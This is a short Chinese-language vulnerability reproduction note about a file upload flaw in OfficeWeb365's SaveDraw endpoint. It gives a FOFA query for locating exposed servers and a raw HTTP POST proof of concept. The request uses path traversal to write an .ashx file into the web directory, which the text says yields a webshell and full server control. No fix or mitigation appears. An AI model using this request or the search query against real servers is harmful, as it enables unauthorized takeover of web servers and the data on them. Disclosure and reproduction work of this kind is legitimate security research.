OfficeWeb365 SaveDraw 文件上传漏洞复现

0x01 产品简介

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。

0x02 漏洞概述

OfficeWeb365 SaveDraw接口处存在文件上传漏洞，攻击者可通过该漏洞直接上传一个 webshell 到服务器上，获取服务器权限，进?控制整个 web 服务器。

0x03 复现环境

FOFA：body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"

0x04 漏洞复现

PoC

POST /PW/SaveDraw?path=../../Content/img&idx=qwe.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

data:image/png;base64,01s34567890123456789y1234567890